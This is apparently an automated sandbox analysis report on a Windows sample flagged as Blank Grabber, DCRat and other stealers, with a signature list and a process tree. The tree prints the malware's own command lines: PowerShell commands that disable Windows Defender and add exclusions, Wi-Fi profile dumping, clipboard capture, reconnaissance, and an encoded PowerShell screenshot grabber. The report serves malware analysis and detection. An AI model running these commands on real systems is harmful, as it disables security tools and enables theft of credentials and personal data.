Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8Ck8T5qRcC.exe

Overview

General Information

Sample name:8Ck8T5qRcC.exe
renamed because original name is a hash value
Original sample name:4FEC8FAF6590F62034AD44A54175B9E9.exe
Analysis ID:1485736
MD5:4fec8faf6590f62034ad44a54175b9e9
SHA1:d7f0d639d943aeee3f98442eec744ca0e78a07d1
SHA256:68231c9b195a3987bc26bb9af2543f49a04c1343bbb17982bc6302a21138e33a
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Stop multiple services
Yara detected Blank Grabber
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected Telegram RAT
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Binaries Write Suspicious Extensions
Stops critical windows services
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 8Ck8T5qRcC.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\8Ck8T5qRcC.exe" MD5: 4FEC8FAF6590F62034AD44A54175B9E9)
    • hacn.exe (PID: 6616 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
      • hacn.exe (PID: 6804 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
        • cmd.exe (PID: 2004 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • s.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)
            • svchost.exe (PID: 3808 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)
              • wscript.exe (PID: 7080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • ChainComServermonitor.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
                    • csc.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • cvtres.exe (PID: 7612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • setup.exe (PID: 6956 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
    • based.exe (PID: 6664 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)
      • based.exe (PID: 6828 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)
        • cmd.exe (PID: 6972 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6468 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6948 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3236 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6584 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7616 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7724 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 8176 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3084 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7908 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7356 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 4520 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • cmd.exe (PID: 7940 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7404 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 7388 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • cmd.exe (PID: 8060 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 8088 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 5932 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • getmac.exe (PID: 8076 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
        • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8152 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 7204 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
